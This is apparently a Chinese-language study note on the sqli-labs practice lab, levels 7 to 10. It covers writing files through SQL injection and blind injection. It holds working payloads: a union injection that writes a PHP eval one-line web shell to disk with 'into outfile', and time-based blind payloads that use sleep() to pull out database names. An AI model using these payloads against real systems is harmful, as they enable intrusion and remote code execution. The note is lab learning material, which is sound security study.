0x01 sql导入导出相关操作知识

执行一句话或者文件传入的要求：
1.绝对物理路径
2.构造有效的畸形语句（报错爆出绝对路径）
传入一句话：
select "<?php @eval($_post["mima"])?>" into outfile "F:\\phpstudy\\PHPTutorail\\WWW\\3.php"

系统自创建3.php，填入一句话字符串
//很重要 这里一句话一句 post数组中的单引号 那么一句话就要用双引号才能正确输入。

less-7

less7要求dump file
需要把一句话成功写入到数据库中。需要晓得表有几列
order by >> 三列

构造一句话payload:
http://127.0.0.1/sqlilabs/Less-7/?id=1%27))union%20select%201,2,%27%3C?php%20@eval($_post[%22mima%22])?%3E%27%20into%20outfile%20%27F:\\phpstudy\\PHPTutorial\\WWW\\sqlilabs\\Less-7\\sen.php%27--+

less-8

通过id构造发现id=1’没有显示错误信息，应该是php对错误隐藏
根据boolean报错构造payload
IF(ASCII(substr(database(),1,1))=115,1,sleep(5))

less-9

不存正确错误与否都都市输出you are in…有点头大 ，（偷偷看了源代码,less-8变形）

看了下博客，看来还是得好好挖掘下题目信息

由于输入什么都是you are in… 只能根据sleep()函数得到我们所要的信息了

根据 sleep 一个个爆数据库名 表 列 字段 ：个数>>每个长度>>每个字段

less-10

less-10与 less-9 就差个 （‘）转变为 (“)